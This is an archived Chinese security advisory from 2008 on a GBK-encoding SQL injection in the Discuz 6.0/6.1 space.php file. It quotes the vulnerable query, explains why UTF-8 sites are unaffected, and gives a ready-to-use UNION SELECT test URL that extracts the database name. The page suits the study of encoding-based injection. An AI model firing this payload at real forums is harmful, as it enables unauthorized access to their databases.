首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Discuz Spache.php注射漏洞
来源:www.vfcocus.net 作者:vfocus 发布时间:2008-08-19  
影响版本:
Discuz6.0.0
Discuz6.1.0
描述:
discuz的空间功能 space.php
$member = $db->fetch_first("SELECT m.*, mf.*, u.grouptitle, u.type, u.creditshigher, u.creditslower,
u.readaccess,
u.color AS groupcolor, u.stars AS groupstars, u.allownickname, u.allowuseblog, r.ranktitle,
r.color AS rankcolor, r.stars AS rankstars $oltimeadd1
FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf ON mf.uid=m.uid
LEFT JOIN {$tablepre}usergroups u ON u.groupid=m.groupid
LEFT JOIN {$tablepre}ranks r ON m.posts>=r.postshigher
$oltimeadd2
WHERE ".($uid ? "m.uid='$uid'" : "m.username='$username'")."ORDER BY r.postshigher DESC LIMIT
1");


查询中包含username值查询,经过编码构造可产生注射漏洞 UTF-8 不存在此漏洞

最近常出现类似的编码注射漏洞,这是因为例如gbk这种编码下php服务器不能很好的过滤'号

以造成漏洞的发生,而使用UTF-8编码的程序不会出现这个问题,不会产生编码转换时的错误,

号得到了完好过滤,杜绝了编码注射漏洞的发生.
<* 参考
暂无
*>
测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
http://地址/space.php?username=%cf'%20UNION%20Select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
,
36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,
6
8,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*
安全建议:

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·dedecms tag.php注入漏洞分析与
·公开一个路径优先的"圈day"
·dedecms注射漏洞
·QQ Mail跨站脚本漏洞
·Apache Tomcat UTF-8编码漏洞
·Discuz!NT 2.5(20080826更新前
·phpwind任意修改管理员密码漏洞
·php第三方编码转换类安全警告
·安全天使sablog注射漏洞
·Discuz!论坛wap功能模块编码的注
·IE8 XSS Filter Bypass
·QQ客户端网站链接过滤不严可导致
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved